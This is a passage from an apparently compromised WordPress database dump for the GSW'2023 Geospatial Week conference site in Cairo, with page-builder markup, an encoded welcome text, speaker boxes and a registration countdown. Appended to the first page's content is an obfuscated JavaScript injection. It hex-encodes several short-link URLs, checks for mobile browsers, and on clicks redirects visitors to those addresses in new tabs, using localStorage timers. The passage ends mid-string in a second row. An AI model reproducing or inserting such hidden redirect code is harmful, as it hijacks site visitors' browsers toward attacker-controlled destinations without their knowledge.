width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-20 11:29:15','2022-10-20 11:29:15','',2167,'https://gsw2023.com/?p=2913',0,'revision','',0),
(2914,1,'2022-10-20 12:18:55','2022-10-20 12:18:55','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjB